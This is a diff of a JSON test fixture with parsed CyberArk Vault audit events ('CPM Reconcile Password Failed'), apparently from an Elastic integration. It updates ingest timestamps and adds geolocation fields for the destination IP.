@@ -415,7 +451,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403084500Z", + "ingested": "2021-12-14T14:42:37.331272134Z", "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -444,6 +480,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -525,7 +570,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403089800Z", + "ingested": "2021-12-14T14:42:37.331272528Z", "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM 
Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -554,6 +599,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -634,7 +688,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403095100Z", + "ingested": "2021-12-14T14:42:37.331272925Z", "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -663,6 +717,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -745,7 +808,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:37:08.403100500Z", + "ingested": "2021-12-14T14:42:37.331273308Z", "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", 
@@ -774,6 +837,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -854,7 +926,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403105900Z", + "ingested": "2021-12-14T14:42:37.331273717Z", "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
